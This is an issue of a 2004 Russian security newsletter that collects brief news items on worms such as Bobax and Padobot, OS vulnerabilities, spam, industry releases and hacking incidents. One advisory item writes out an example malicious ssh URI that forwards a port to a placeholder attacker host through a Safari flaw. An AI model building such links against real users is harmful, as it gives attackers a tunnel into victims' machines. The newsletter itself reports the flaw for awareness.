uinC NewsLetter #22, 2004


Приветствуем!

Новости из Security Мира

24/05/2004 11:33 Организаторы Олимпиады в Афинах ждут волны хакерских атак
Организаторы Олимпийских игр в Афинах готовятся к отражению волны кибератак против официальных интернет-ресурсов соревнований, сообщает Silicon.com. Обеспечивать IT-безопасность Олимпиады поручено компании Atos Origin, подписавшей с Международным олимпийским комитетом (МОК) контракт на период с 2002 по 2008 год. По словам представителей Atos Origin, зимой 2002 года сетевые ресурсы Олимпийских игр в Солт-Лейк-Сити подверглись нескольким сотням атак, и активность хакеров во время соревнований в Афинах снизится вряд ли. «Мы уже зафиксировали рост подозрительной активности вроде проверки надежности сетевых экранов», - сообщил менеджер Atos Origin Ян Ноблот (Yan Noblot).
Источник

24/05/2004 12:09 "Фотошоп" внутри QuarkXpress
Представители компании Quark продемонстрировали на выставке DRUPA 2004 модуль расширения для настольной издательской системы QuarkXpress 6, реализующий функции обработки изображений - QuarkVista. В компании надеются, что встроенный в QuarkXpress редактор такого рода обеспечит пользователям экономию времени по сравнению с системами обработки изображений, предлагаемыми сторонними производителями. QuarkVista позволяет производить цветовую коррекцию иллюстраций в публикации, обрабатывать их при помощи различных фильтров, масштабировать, обрезать, поворачивать и "перекашивать". При этом в само изображение никаких изменений не вносится, так что все модификации можно в любое время отменить или подкорректировать. Модуль также позволит выполнять преобразования между различными форматами графических файлов.
Источник

24/05/2004 12:21 Спамеры создают себе отборную армию зомби
Червь Bobax, меньше чем за неделю породивший целых четыре своих варианта, стал одним из первых компьютерных червей, которые определяют пропускную способность зараженного ими хоста, чтобы понять, стоит ли использовать его в качестве зомбированных источников спама. Bobax задействует комбинацию уязвимостей Windows, эксплуатировавшихся червями Sasser и MSBlast. Он вряд ли получит широкое распространение, так как крупные компании уже установили соответствующие заплатки, но его поведение показывает, что писатели вирусов и профессиональные спамеры получили контроль над более чем достаточным количеством компьютеров — и теперь могут выбирать, какими из них им воспользоваться. Директор финской антивирусной компании F-Secure Микко Хиппонен отмечает, что хотя червь Bobax заражает любые уязвимые машины, в него встроена утилита, которая помогает авторам вируса решить, достаточно ли высока скорость связи этой машины с интернетом, чтобы её стоило включать в свою армию зомбированных источников спама. Вирус определяет производительность, приказывая заражённому компьютеру загрузить крупный файл с общедоступного FTP-сайта. Собрав некоторую статистику о пропускной способности линии связи, он передает её автору вируса, чтобы тот мог использовать компьютер в соответствии с требованиями спамера. «У спамеров столь широкий выбор машин, что они могут позволить себе выбирать лучшие — с самыми быстрыми каналами связи и самой высокой производительностью», — говорит Хиппонен.
Подробности

24/05/2004 12:45 Операционная система для самых мощных в мире ноутбуков
Американская компания Liebermann, занимающаяся выпуском эксклюзивных компьютеров, в частности, ноутбуков на процессорах Pentium 4 Extreme Edition, объявила о создании собственной операционной системы под названием L OS, cообщает "Компьюлента". Эта система основывается на коде Linux и включает поддержку ряда фирменных технологий Liebermann - PuRam Drives, Instant-On Technology, SuperBIOS, CacheFlow, а также новой высокопроизводительной периферии и 64-разрядных процессоров. По заявлениям компании, главной задачей при создании L OS было максимально полно удовлетворить все требования потребителей и создать наиболее удобную, быструю и стабильную вычислительную платформу. В L OS будет встроен эмулятор, обеспечивающий совместимость с приложениями для Windows. В новой ОС также реализуется гибкое управление оборудованием, включая динамическое повышение и снижение тактовой частоты процессора. В Liebermann планируют выпускать две версии операционной системы - для серверов и для клиентских компьютеров. В компании утверждают, что L OS будет распространяться в комплекте со всем необходимым для современного компьютера программным обеспечением. При этом система будет использовать тот же интерфейс, что и WinXP4L - специальная модификация Windows XP, используемая Liebermann. Впрочем, Windows XP также будет устанавливаться на компьютеры компании. Пока L OS находится на ранней стадии разработки, однако уже в скором будущем вместе с компьютерами Liebermann будет поставляться предварительная альфа-версия этой ОС.
Подробнее

24/05/2004 13:52 Электронная почта США завалена спамом
Согласно сообщениям, более 80% отправленных писем в США - спам. Согласно отчету MessageLabs, две трети всех электронных писем во всей мировой сети имеют рекламный характер. В тоже время в США таких писем - четыре из пяти. В Европе ситуация несколько лучше, чем в Америке. В Англии, например, спам составляет только половину почтовой корреспонденции. В Германии - 41%, а в Австрии 32%. Этот отчет компания составила на основе количества спама отфильтрованного ее спам-фильтрами, установленными более чем у 8500 клиентов по всему миру. Представитель MessageLabs сообщил, что еще год назад соотношение составляло 50/50, но, учитывая такие темпы роста, можно предполагать что количество спама вырастет и будет более 90% за год. Другая компания, занимающаяся разработкой спам-фильтров, Postini Inc сообщила на слушаниях в конгрессе о подобных результатах. По ее мнению, 83% электронных сообщений за последний месяц были отфильтрованы у пользователей и содержали спам. Высоким уровнем спама и его ростом продиктовано принятие правительством США закона "Can Spam Act". Однако, как заявила Postini в конгрессе, спамеры находят все новые способы, чтобы обойти этот закон.
theinquirer.net

24/05/2004 13:53 В Zone Alarm добавят антивирус
Теперь популярный фаервол будет содержать в себе функции антивируса. Об этот сообщил в понедельник Фред Фельман (Fred Felman) вице-президент по маркетингу Zone Labs, независимого отделения Check Point Software Technologies. Zone Labs лицензировала антивирусную технологию eTrust Antivirus у Computer Associates International. Ожидается, что новое добавление к линейке продуктов позволит Zone Labs посоперничать с двумя основными игроками рынка продуктов для домашней безопасности - Symantec Norton Internet Security и Network Associates McAfee Internet Security Suite. Антивирусная функция будет доступна только в коммерческой версии Zone Alarm, хотя "basic" конфигурацию фаервола можно скачать с веб сайта компании бесплатно.
CNET News.com

24/05/2004 14:09 Уязвимость в OpenBSD
Сообщаетя об обнаружении уязвимости в ОС OpenBSD. Из-за некорректной обработки ядром данных при чтении данных из файловой системы proc возможно получение доступ к защищённым областям памяти ядра. Указывается на наличие некорректности обработки данных в файле иссходного кода procfs_cmdline.c. Патчи доступны на сайте производителя (www.openbsd.org).
Описание

24/05/2004 14:28 Компьютерные преступления: 15 раскрыто, 85 – в тени
По механизму и способам совершения преступления в сфере компьютерных технологий имеют высокий уровень латентности. По данным Национального отделения ФБР по компьютерным преступлениям, от 85 до 97% компьютерных посягательств даже не выявляются. По оценкам иных экспертов, латентность «компьютерных» преступлений в США достигает 80%, в Великобритании – до 85%, в ФРГ – 75%, в России – более 90%. За рубежом, где накоплена достаточно большая и достоверная статистика компьютерных преступлений, до суда доходят меньше 1% нарушений. При этом, по утверждению специалистов, ревизия в состоянии выявить не более 10% электронных хищений. Из 100 «пластиковых» преступлений раскрываются 15. По данным МВД России, каждый год карточные мошенники наносят банкам до 4 миллиардов долларов прямого ущерба. Еще в два миллиарда обходится распутать последствия «взломов». Кроме того, клиент, обидевшись на ненадежность системы своего банка, может просто отозвать из него все свои средства. Большинство краж от беспечности, - объясняет первый заместитель начальника Главного управления МВД России, курирующий линию «К», Константин Мачабели. - Вот исчезли с вашей карточки 100 долларов. Вы подумаете: «Может, потратила и забыла?». А многие люди до сих пор пишут пин-коды прямо на картах. Часто «наши» жулики воруют деньги с карточек иностранцев. Информации с их банков не дождешься. Оттого процент раскрываемости карточных махинаций - около 15. Однако наши банки доверяют нам все больше, потому что вместе мы способны проследить любую махинацию и выйти на вора.
Статья crime-researh.ru

24/05/2004 14:45 NetSQUID - инструмент для интеграции Snort и IPTables
Довольно полезный для системных администраторов инструмент под названием NetSQUID - представляет собой скрипт на Perl, основное назначение которого - организовать взаимодействие IDS Snort с файрволлом Linux - IPTables. На основании анализа предупреждений, выдаваемых Snort позволяет при помощи IPTables блокировать источник атак (в том числе и даже в первую очередь - вируссных). Блокируемые сайты автоматически разблокируются через определённый промежуток времени.
Сайт проекта

25/05/2004 10:42 "Моссад" набирает агентов через Интернет
Израильская служба внешней разведки "Моссад" начала рекрутинговую кампанию через свой официальный сайт в Интернете, сообщает Reuters. Как следует из информации, размещенной на сайте, "Моссаду" требуются как агенты для выполнения специальных заданий и информационные аналитики, так и простые водители и официанты. По словам шефа израильской разведки Меира Дагана (Meir Dagan), открытие вакансий через Интернет свидетельствует о новом, более открытом курсе "Моссада". Ранее агенты-ветераны, уходившие на пенсию, приводили на свое место друзей. Теперь разведслужба намерена привлечь талантливых людей "со стороны". "Главная опора "Моссада" - это люди, работающие у нас", - заявил Меир Даган.
Источник

25/05/2004 11:37 Microsoft сделает ОС для суперкомпьютеров
Корпорация Microsoft готовится к экспансии в очередной рыночной нише. На этот раз целью софтверного гиганта являются операционные системы для высокопроизводительных вычислительных кластеров, где в настоящее время господствует Linux, cообщает "Компьюлента". Сейчас кластеры, состоящие из большого числа относительно недорогих стандартных компьютеров, соединенных высокоскоростными магистралями передачи данных, являются самым популярным типом суперкомпьютеров. Абсолютное большинство новых высокопроизводительных вычислительных систем основаны именно на кластерной схеме. В настоящее время в подразделении по разработке серверного программного обеспечения действует специальный отдел высокопроизводительных вычислений (High Performance Computing или HPC). По сообщению CNET News, сейчас специалисты заняты созданием новой модификации Windows Server 2003 под названием Windows Server HPC Edition, которая и будет предназначена для вычислительных кластеров. Руководит работами над новой модификацией Windows Кайрил Фаэнов, причем в отдел постоянно набираются новые сотрудники. Пока, впрочем, неясно, когда Windows Server HPC Edition появится на рынке. По самым смелым прогнозам, система увидит свет после выпуска первого сервис-пака к Windows Serer 2003 в этом году. Однако более вероятной датой представляется 2005 год, когда Microsoft планирует выпустить Windows Server 2003 R2 - вторую редакцию своей последней серверной ОС. Помимо самой операционной системы, планируется выпустить и ориентированные на кластерные вычисления инструментарии для разработчиков прикладного ПО.
Подробности

25/05/2004 11:50 Для разработчиков Linux введены новые правила
В понедельник организация Open Source Development Labs, продвигающая Linux, сообщила, что она принимает новую систему приёмки с целью лучшего отслеживания и документирования вкладов кода в ядро ОС. Организация, в которой работает создатель Linux Линус Торвальдс, предупреждает, что по новой системе дополнения в ядро Linux смогут вносить только те разработчики, которые согласятся передавать код в соответствии с «надлежащими» лицензиями open source. Система добавляет соглашение, называемое «Сертификатом авторства разработчика» (Developer's Certificate of Origin, DCO), гарантирующее выражение признательности программистам за дополнения и производные работы, а также тем, кто «собирает материалы и продвигает их без изменений вверх по дереву ядра». Соглашение DCO призвано исключить вопросы и юридические споры по поводу авторства на фрагменты кода Linux. В прошлом году SCO Group, которой принадлежат некоторые права интеллектуальной собственности по Unix, подала в суд на IBM за нарушение контракта: IBM якобы перенесла в Linux её технологию Unix, которая должна была оставаться в тайне. Новая система не поможет дать ответы на вопросы об уже включённом в Linux коде. Но она полезна для будущих релизов, пояснил директор Open Source Development Labs Стюарт Коуен. «Очевидно, что это относится только к коду, предоставляемому с сегодняшнего дня. Однако можно рассчитывать, что это окажет серьёзное влияние уже на будущую версию 2.7 (ядра Linux), которая должна выйти через год».
Подробнее об DCO

25/05/2004 13:11 Один из сайтов Microsoft был атакован хакерами
The Inquirer со ссылкой на Zone-h сообщает, что вчера был задефейсен один из веб сайтов Microsoft-а www.microsoft.com/mspress/uk/. "Португальский хакер представляющий группу "Outlaw group" задефейсил ультра защищенный сайт используя хорошо известную уязвимость, которая должна была быть пропатчена месяц назад", говоится в сообщении. Хакер изменил страницу, содержащую информацию о пресс-релизах, оставив сообщение "Owned OutLaw Group by Pharoeste e Wolfblack". Атакующий использовал "SQL injection" атаку на администранивной странице. Скриншот можно посмотреть здесь.Расстраивает тот факт, говорится в сообщении, что сайт, содержащий пресс-релизы описывающие патчи и пропагандирующий индустриальную безопасность, сам не был пропатчен вовремя. Microsoft узнала о случившемся из сообщения Zone-h, а измененная страница какое-то время находилась в кеше Googl-а. Представитель Zone-h сообщил, что эта хакерская группа заявила о себе в декабре прошлого года, сломав один бразильский сайт. Сейчас на ее счету более 60 сайтов.
theinquirer.net

25/05/2004 14:29 Загрузку веб-страниц ускорили
Устройства и программное обеспечение, ускоряющие доступ к ресурсам интернета, обещают немалые преимущества как профессионалам в области сетевых технологий, так и рядовым пользователям. Проблема скорости загрузки веб-страниц во многом обусловлена устаревшей веб-технологией, которая была создана еще в 70-е годы. Американская компания NetScaler, поставщик сетевых технологий, разработала устройства, которые помогут решить эту проблему. По мнению Б. Джагадиша (B.V. Jagadeesh), основателя компании NetScaler, задержки в загрузке страниц во многом обусловлены действующим в глобальной паутине протоколом межсетевого взаимодействия ТСР/IP. Он требует отдельной команды каждый раз, когда происходит загрузка одного из объектов веб-страницы - текста, таблиц, графики, анимации и т.д. Таким образом, для каждого объекта требуется отдельное соединение, и если объектов на странице 40-50, то и соединений требуется столько же. Компьютер при этом принимает и отправляет для каждого объекта команды, подтверждающие нормальный процесс загрузки. Крупные фирмы, обслуживающие большое число запросов своих сотрудников, специально приобретают серверы, которые берут на себя функцию исправления ошибок, возникающих при загрузке с помощью протокола ТСР/IP. NetScaler предложила устройства, которые устанавливаются перед сервером и выполняют единственную функцию - поддерживать открытыми соединения с теми объектами на веб-странице, которые уже открыты. Теперь вместо того, чтобы открывать и закрывать многочисленные соединения, можно ограничиться только небольшим числом этих соединений. В итоге можно сократить и число серверов, обслуживающих то же количество клиентов. Одной из самых крупных компаний, которая заинтересована в приобретении устройств, является Google, которая уже закупила около 70 устройств NetScaler для обеспечения услуги поиска изображений в Сети. Несомненно, что подобные устройства пригодятся самым разным интернет-компаниям, работающим в сфере электронной торговли, и информационным порталам.
Источник

25/05/2004 15:02 Windows 98 на Pocket PC КПК - уже реальность
Энтузиаст по кличке Miracle с форумов сайта PDAi.org сумел достичь почти невозможного – запустить на своем ASUS MyPAL КПК Microsoft Windows 95 и Windows 98SE, сообщает mobile-review.com. Речь, конечно, не идет об установке Windows 95 как основной ОС КПК – тут на помощь пришла портированная версия эмулятора x86-компьютеров Bochs x86, а образ жесткого диска с установленной ОС был подключен с настольного ПК через WiFi-интерфейс. Сообщается, что скорость эмуляции оставляла желать лучшего, но сам факт, а также тенденции к увеличению производительности КПК вселяют надежду на лучшее :)
Подробности

25/05/2004 19:23 Уязвимость в VocalTec Gateways позволяет провести DoS-атаку
Secunia сегодня опубликовала сообщение об обнаруженной уязвимости в VocalTec Telephony Gateways. Уязвимость присутствует в VocalTec Telephony Gateway VGW120 / VGW480 благодаря ошибке при обработке некоторых пакетов H.323 траффика приводящей к краху системы. Эксплоит существует. Об уязвимости сообщил Тагов Евгений (Tagoff Eugene) на securitylab.ru.
Secunia Advisory

25/05/2004 19:43 Сравнение безопасности ОС Linux и Windows
Довольно интересная статья опубликована на сайте NewsForge. Название статьи "Linux and Windows security compared". Автором статьи является Stacey Quandt - аналитик фирмы Quandt Analytics. Естественно, сама статья не претендует на абсолютную истину в части компьютерной безопасности, однако написана довольно интересно и без излишней (с моей точки зрения - прим. ньюсмейкера) прверженности одной или другой ОС (что бывает довольно часто в подобного рода обзорах). Обе ОС рассмотрены с точки зрения различных характеристик, как то: безопасность основных компонентов ОС, безопасность сетевых протоколов и сетевого стека, система выпуска патчей (заплаток) и своевременность их выхода и многое другое. Кстати, все выводы оформлены в виде результирующей таблицы.
Статья

25/05/2004 20:18 CA пообещала открыть исходники БД Ingres
Известная компания CA (Computer Associates International) в понедельник сделал очень важное заявление, в котором пообещала открыть исходный код известной СУБД Ingres, а также начать течное сотрудничество в других open-source проектах. Компания планирует в течение 90 дней выложить исходный код для сборки СУБД Ingres для ОС Linux. Также компания предложила open-source лицензию, которая получила название CA Trusted Open Source License (CA-TOSL), которая призвана подтвердить легальность исходного кода корпоративным пользователям.
Подробности

26/05/2004 09:34 Webmoney.by закрыт милицией
21 мая приостановил свою работу платёжный ресурс Webmoney.by, занимающийся обслуживанием клиентов платежной системы WebMoney Transfer в Беларуси.При этом на самом сайте размещено достаточно традиционное для подобных случаев объявление: "Сервис WEBMONEY.BY не работает. Все вопросы по возмещению непогашенных кредитов будут решены в течение ближайших дней. Приносим свои извинения и благодарим за понимание". По информации беларусских СМИ, причиной стало закрытие милицией офиса службы. Это произошло после открытия уголовного дела по обвинению в незаконной предпринимательской деятельности против владельцев Webmoney.by. Более конкретно – в осуществлении валютных операций без лицензии. По нему хозяевам грозит срок до 5 лет лишения свободы. Сообщается также, что в офисе Webmoney.by был произведен обыск с изъятием документов и компьютерной техники.
SmartBit.info

26/05/2004 09:45 Microsoft решила завоевать рынок корпоративных средств сетевой безопасности
Компания Microsoft в понедельник объявила о своих планах по выходу на рынок корпоративных программных средств сетевой безопасности. Как сообщает Reuters, на конец этого года запланирован выход нового продукта от Microsoft - Internet Security and Acceleration (ISA) Server 2004. Эта программа является переработкой инструмента ISA 2000, предназначенного для обеспечения безопасности корпоративных сетей, контроля за параметрами безопасности и для оптимизации работы сетевых приложений. Для продвижения продукта на новом рынке Microsoft намеревается продавать его вместе с сетевым оборудованием своих партнеров - в частности, Hewlett-Packard и Network Engines. Таким образом, отмечают аналитики, Microsoft пытается завоевать новый для себя рынок, на котором традиционно доминируют компании CheckPoint Software и SonicWall. Цена копии ISA Server 2004 для одного сервера, как ожидается, составит 1499 долларов. Довольно любопытное начинание компании, не успевающей вовремя закрывать дыры в "сами_знаете_какой" операционной системе. Впрочем, с финансовой точки зрения, вполне обоснованное.
Подробности

26/05/2004 09:58 Азиатский хакер подобрался к американским баллистическим ракетам
Полиция Республики Корея совместно с коллегами из США приступила к выяснению обстоятельств хакерской атаки, в ходе которой житель одной из азиатских стран взломал несколько компьютеров сети аэрокосмического департамента ВВС США, сообщает сайт газеты Chosunilbo. Для получения доступа к машинам американской военной авиации злоумышленник использовал компьютеры двух корейских компаний. Инцидент произошел в феврале этого года. В США сразу посчитали инцидент серьезным и в спешном порядке попросили корейские власти расследовать его. Для установления личности преступника следственные органы двух стран наладили самое тесное взаимодействие. Аэрокосмический департамент ВВС США - одно из крупнейших управлений американского оборонного ведомства и главный орган, ответственный за пуски межконтинентальных баллистических ракет, обеспечение работы спутников и радарного оборудования. Следственным органам достоверно известно, что хакерская атака важного стратегического объекта была проведена с территории одного из азиатских государств. Название этого государства не приводится из дипломатических соображений. Компании, компьютеры которых были использованы в рамках атаки, располагаются в южнокорейских городах Инчхон и Тэгу. Выбор злоумышленником южнокорейских машин в качестве инструмента для нападения на американские военные компьютеры, вероятно, обусловлен высоким уровнем развития интернета в этой стране и его тесной интеграцией с сетями в США. Руководство и персонал южнокорейских компаний не подозревали о том, что их машины взломаны и используются для проникновения в сеть американского военного ведомства. Полиция отметила высокую квалификацию хакера, использовавшего одновременно два компьютера для усложнения задачи правоохранительных органов. Помимо американской военной сети хакер получил доступ к компьютерам, расположенным еще в 12 странах, в том числе на Тайване и в Японии. В США и Республике Корея полагают, что уже сумели установить личность преступника и намереваются направить запрос об экстрадиции правительству его страны.
viruslist.ru

26/05/2004 10:10 Cетевой червь Padobot.
"Лаборатория Касперского" сообщает об обнаружении двух версий нового сетевого червя Worm.Win32.Padobot. Червь распространяется, используя для своего размножения уязвимость в службе LSASS Microsoft Windows. Ее описание приведено в Microsoft Security Bulletin MS04-011. После заражения инфицированная машина выводит сообщение об ошибке "LSASS service failing", после чего может попытаться перезагрузиться. Червь открывает на зараженной машине порты TCP 113, 3067 и 2041 для приема команд. При запуске червь копирует себя в системный каталог Windows с произвольным именем и регистрируется в ключе автозапуска системного реестра:[HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun] "WinUpdate"="%system%[имя файла]".
Также создает ключ: [HKLMSOFTWAREMicrosoftWireless] "Server"="1". Создает в памяти уникальные идентификаторы "10", "u2", и "uterm5" для определения своего присутствия в системе.
Лаборатория Касперского

26/05/2004 10:14 Lindows одержала предварительную победу над Microsoft
Компания Lindows одержала еще одну небольшую победу над Microsoft в Соединенных Штатах. В понедельник в ходе девятой сессии выездного апелляционного суда было постановлено, что термин "окна" (windows) являлся общеупотребительным до ноября 1985 года, то есть до того момента, как софтверный гигант выпустил первую версию своей всемирно известной операционной системы. Ранее в этом году Microsoft удалось одержать победу над компанией Майкла Робертсона в Бенилюксе (Бельгия, Нидерланды, Люксембург), где операционные системы Lindows теперь продаются под торговой маркой Linspire. Однако в США дело пока находится на стадии рассмотрения, и в ближайшее время изучением вопроса о правах Microsoft на торговую марку Windows займется суд. По словам представителей Microsoft, решение апелляционного суда лишь отодвигает временные рамки исхода процесса, но нисколько не меняет его сути. Другими словами, софтверный гигант полностью уверен в своей окончательной победе. В Lindows же, напротив, считают, что теперь их шансы на выигрыш дела существенно возросли, поскольку защита компании строится, в основном, на том, что термин "окна" характеризует особенности современных интерфейсов и не может являться исключительной торговой маркой Microsoft
"Компьюлента"

26/05/2004 13:09 Lucent покупает производителя VoIP-систем
Компания Lucent Technologies восполнит недостаток ассортимента предлагаемого ею оборудования и программного обеспечения VoIP, приобретя за 295 млн. долл. компанию Telica. В результате сделки в распоряжение Lucent перейдут медиашлюз, сигнальный шлюз и контроллер медиашлюзов производства Telica. Системы будут включены в линейку продуктов Lucent Accelerate VoIP Solutions, в состав которой также входят сервисные приложения типа программного коммутатора IP-телефонии и VPN-сервера. В Lucent рассчитывают, что покупка позволит ей нарастить долю рынка оборудования VoIP, объем которого, по прогнозу IDC, превысит к 2007 году 15 млрд. долл. Как отмечают аналитики, Telica Plexus 9000 - один из самых мощных медиашлюзов из имеющихся сейчас на рынке.
osp.ru

26/05/2004 13:45 Эпопея URI-уязвимостей в MacOS продолжается
В дополнение к предыдущим URI-уязвимостям в MacOS появилась ещё одна. На сей раз на сайте insecure.ws опубликовано сообщение о существовании уязвиимости в обработке URI в браузере Safari. При задании в поле URI ссылки на ssh могут выполняться произвольные команды (с выставленной опцией ProxyCommand). Также можно использовать в формируемом URI опцию проброса портов -R, для чего необходимо софрмировать следующую ссылку - ssh://ssh haxor.com -R port:localhost:port. Как пишет сам автор, вполне возможно, что уязвимость существует и в других браузерах - Camino,Firefox,Mozilla, однако ему её не удалось воспроизвести на них (возможно, из-за багов в обработке переключателей на использующемся Gnome 2.6.1. Также возможно существование уязвимости в других ОС, однако подтвердить это не удалось. Проверена только защита браузера konqueror (не сработало). На странице с описанием приводится ссылка на демо-страницу с эксплоитом. Кроме того, существует частный патч для латания уязвимости, ссылка на который приведена ниже.
Описание
Патч

26/05/2004 14:37 Новый инструмент для программистов от @stake.
В понедельник известная секьюрити-компания @stake, расположенная в Кембридже (штат Массачусетс, США) объявила о выпуске инструментария для программистов под названием SmartRisk Analyzer, предназначенного для анализа компьютерного кода программ, написанных на C, C++ и Java с целью нахождения в нём потенциально опасного кода, который мог бы привести к переполнению буфера. Используя технологию под названием "глубокий бинарный анализ" ("deep binary analysis"), продукт позволяет сканировать компьютерный код даже после компиляции (или трансляции). О новом продукте сообщил компьютерной общественности вице-президент компании Chris Wysopal. Инструмент тесно взаимодействует как с API для обеспечения безопасности и криптографии, так и с сетевыми файловыми сервисами. При анализе кода используется собственная база @stake, в которой содержится около 400 примеров уязвимых и потенциально опасных фрагментов кода. Необходимо отметить, что нечто подобное в апреле было представлено компанией Fortify Software Inc., расположенной в Menlo Park, California. Продукт назывался Fortify Source Code Analysis и позволял сканировать исходный код и сравнивать с базой, содержащей 500 примеров уязвимого кода. SmartRisk Analyzer для C и C++ для платформ Windows и SPARC (от Sun) будет доступен в понедельник (следующий?), а для Java планируется к выпуску в июне. Может работать в ОС - Windows XP/2K/2003.
Анонс

26/05/2004 16:02 Ударим вардрайвингом по раздолбайству админов!
В начале июня планируется проведение широкомасшатбной акции по борьбе с использованием незащищенных WiFi-сетей. В 11 странах мира добровольцы будут выявлять незащищенные точки доступа, фиксировать их координаты при помощи GPS-приемников и вносить информацию в WiGLE (Wireless Geographic Logging Engine). Во время прошлой акции (июль 2003) обнаружилось, что 67% из 88 000 точек доступа не использовали даже защиту при помощи WEP (Wired Equivalent Privacy, устаревший к настоящему времени протокол, который должен быть заменен на WiFi Protected Access). Мероприятие пройдет с 12 по 19 июня. Дополнительные подробности можно узнать по адресу - http://www.worldwidewardrive.org/wwwd4/index.html. На просторах exUSSR мероприятие трудно реализуемо ввиду не очень широкой распространенности у народонаселения GPS-приемников и электронных карт с нормальной привязкой к координатам...
bugtraq.ru

27/05/2004 10:06 Американские пользователи не видят большого вреда в черве Sasser
Интернет-червь Sasser, впервые обнаруженный 1 мая, поразил менее одного процента всех компьютеров под управлением операционной системы Windows. Таковы результаты опроса, проведенного специалистами в области компьютерной безопасности из компании TruSecure, сообщает сайт газеты Sydney Morning Herald. В поле зрения TruSecure попало около 8,1 млн компьютеров, владельцы которых проживают в основном в США и Канаде. При этом лишь 55 тыс. человек заявили о заражении своих машин червем Sasser. Об убытках, вызванных вредоносной программой, сообщили лишь 29% тех, в чьи компьютеры проник вирус. 73% владельцев инфицированных компьютеров в качестве главного вредоносного эффекта Sasser назвали повышение активности вспомогательного меню операционной системы. В настоящее время общий размер потерь, нанесенных червем Sasser, оценивается в 979 млн долларов США. При этом 522 млн долларов приходится на Северную Америку. Для сравнения - ущерб от Lovesan в Северной Америке составил 1,3 млрд долларов. Sobig обошелся владельцам компьютеров в 1,6 млрд.
Источник

27/05/2004 10:47 Недельный отчет о вирусах Panda Software
Выпущен очередной еженедельный отчёт о вирусной активности прошедшей недели от Panda Software. В нём рассмотрены черви Bobax.A, Bobax.B, Bobax.C, Kibuv.A и Lovgate.AF, а также троянец Ldpinch.W.
Отчёт

27/05/2004 11:15 Microsoft обещает продлить поддержку продуктов
Во вторник Microsoft обнародовала новую долгосрочную политику поддержки, а также анонсировала технологии, направленные на повышение степени безопасности и пресечение спама. Выступая на ежегодной конференции для ИТ-администраторов TechEd в Сан-Диего, Энди Лиз, вице-президент Microsoft по серверным продуктам и инструментам, заявил, что отныне компания гарантирует минимум 10-летнюю поддержку всех своих продуктов для предприятий и разработчиков. Сейчас Microsoft прекращает всяческую поддержку через восемь лет. Компанию активно критиковали за отказ поддерживать старые продукты, в том числе версии операционной системы Windows, которые всё ещё широко используются. Лиз сказал, что новая политика гарантирует корпоративным заказчикам большую ответственность. «С момента поставки вам будет обеспечен гораздо более предсказуемый уровень поддержки». Лиз пообещал также ряд подвижек на фронте e-mail, особенно в части пресечения непрошеной почты. В рамках программы выпуска Service Pack 1 для сервера электронной почты Exchange 2003 компания начнёт предоставлять всем заказчикам возможность установки модуля блокировки спама — интеллектуального фильтра сообщений (Intelligent Message Filtering, IMF). Раньше фильтры предоставлялись только тем, кто заключил с Microsoft лицензионное соглашение Software Assurance. «Мы ни в коем случает не отказываемся от Software Assurance, — пояснил старший директор по Exchange Ким Эйкерс. — Но, учитывая потребности заказчиков и разгул спама, мы решили, что IMF должен быть доступен для всех». Лиз пообещал также усовершенствования в системе блокировки спама посредством функции E-mail Caller ID, которая проверяет данные отправителя сообщения, позволяя блокировать подложную почту. Microsoft планирует ввести эту технологию в дополнение к Exchange Exchange Edge Services, которое выйдет в будущем году.
Подробности

27/05/2004 11:44 Palm OS 5 заговорила по-русски
Компания Paragon Software объявила о выпуске новой версии системы локализации для Palm OS под названием PiLoc 3.6. Эта программа адаптирует для российского пользователя все доступные в настоящее время компьютеры на базе платформ Palm OS 5.0 и выше. Новая версия приобрела ряд дополнительные функций, например возможность не только закачивать новые шрифты (до 20 видов), но и легко переключать их в настройках Font Style, сохранять индивидуальные настройки пользователя (кодировки, раскладки, перевод интерфейса) для каждого установленного языка и др. Также в PiLoc 3.6 появились почтовые агенты, поддерживающие русские кодировки писем (Snapper Mail, Mail), корректно обрабатывается поворот экрана на модели Тungsten Т3, упрощено распознавание очертаний символа "Б" и реализована возможность посылать русскоязычные SMS сообщения для смартфона Treo 600. Одновременно с системой локализации вышла и новая версия PiLoc Monitor 1.4, а также утилита--компилятор шрифтов, работающая под PiLoc версии 2.25 - 3.6.
osp.ru

27/05/2004 12:34 Выход FreeBSD 4.10-RELEASE
Ну вот и свершилось! Праздник среди почитателей отличной ОС FreeBSD наконец-то наступил! Сегодня Ken Smith от имени команды разработчиков FreeBSD объявил о выходе новой версии этой ОС - 4.10-RELEASE. Как пишется в анонсе, этот релиз является последним релизом в ветви STABLE. Относительно версии 4.9, выпущенной в октябре 2003 г. были сделаны дополнения к набору софта, включённого в базовый набор дистрибутива, сделаны обновления, связанный с обновлением системы безопасности и добавлены различные багофиксы. Также версия 4.10 станет первым релизом в ветви "Errata Branch" и в рамках этой ветви планируется выпустить FreeBSD 4.11-RELEASE - на основании возможных обнаруженных прорехах в системе безопасности. В дальнейем всё внимание разработчиков будет сосредоточено на ветви 5.х и всем пользователям рекомендуют постепенно мигрировать на неё (в частности, на версию вскоре ожидаемую - 5.3). FreeBSD 4.10 доступна для скачивания в виде ISO-образов (2 CD).
Анонс

27/05/2004 12:41 Вышла Maс OS X 10.3.4
В среду компания Apple представила обновленную версию операционной системы Mac OS X 10.3.4 Panther и обновленную версию Panther Server с тем же порядковым номером, сообщает "Компьюлента". Среди обновлений в пользовательской версии Mac OS - улучшенная система файлового обмена и обновленная версия службы каталогов для Macintosh и Unix, улучшенная поддержка беспроводных сетей и обновленние поддержки OpenGL. Кроме того, в новой версии ОС обновились драйверы для видеокарт ATI и nVidia, небольшие обновления произведены в ПО для записи компакт-дисков. MP3-плеер iPod в новой версии ОС теперь распознается программами iTunes и iSync даже в случае подключения через порт USB 2.0. Была расширена поддержка устройств, подключающихся через порты FireWire и USB 2.0. Обновились и программы, включенные в ОС, в том числе адресная книга, почтовый клиент, браузер Safari, приложения Stickies и QuickTime, улучшена поддержка программ от сторонних производителей. Объем файла обновления для существующих версий Mac OS составляет 41 мегабайт, его можно скачать с помощью системы Software Update.
Подробности

27/05/2004 13:18 Локальная уязвимость в ОС FreeBSD
Как сообщает команда разработчиков FreeBSD, обнаружена локальная уязвимость в ОС FreeBSD, которая может позволить пользователю, имеющему полномочия на чтение файла предотвратить его изменение. Уязвимость связана с системным вызовом msync(2), используемым приложениями, чтобы убедиться в том, что страница памяти помещена во постоянное место хранения (жёсткий диск). Ввиду программистской ошибки в ходе выполнения операции MS_INVALIDATE возможна ситуация, в которой содержимое файла в виртуальной памяти и на жёстком диске будут отличаться. Патчи для версий 4.8, 4.9, 4.10, 5.2 доступны.
Бюллетень

27/05/2004 13:38 Новый сайт по уязвимостям ПО Windows
